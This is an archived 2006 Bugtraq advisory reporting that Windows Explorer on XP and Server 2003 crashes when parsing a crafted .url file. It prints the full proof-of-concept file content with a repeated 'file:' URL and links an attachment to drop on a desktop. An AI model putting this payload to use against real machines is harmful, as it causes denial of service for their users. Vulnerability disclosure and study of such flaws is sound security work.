[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Windows Explorer URL File format overflow

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Windows Explorer URL File format overflow
From: nanika@xxxxxxxxxx
Date: 5 Jul 2006 05:53:52 -0000

Windows Explorer URL File format overflow


Affected Vendor:
Microsoft 

Affected Products:
WindowsXP ALL
Windows2003 ALL


Vulnerability Details:

When explorer.exe parsing *.url file which contains a url as follows format 
will cause explorer.exe crash.




if you create the Exploit.url on Desktop

Explorer will Crash...Crash...Crash...Crash...Crash...Crash...


if you will del exploit.url
open taskmgr.exe
open cmd.exe

then cd your desktop

del exploit.url




Exploit:

[InternetShortcut]
url=file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:


Attachment:
http://hitcon.org/Nanika-desktop_explore_0day.rar
you can drop in desktop :P


http://hitcon.org
http://www.chroot.org

Follow-Ups:
- Re: Windows Explorer URL File format overflow
  - From: naveed

Prev by Date: Shopping Cart V0.9
Next by Date: Touch arbitrary file execute vulnerability
Previous by thread: Shopping Cart V0.9
Next by thread: Re: Windows Explorer URL File format overflow
Index(es):
- Date
- Thread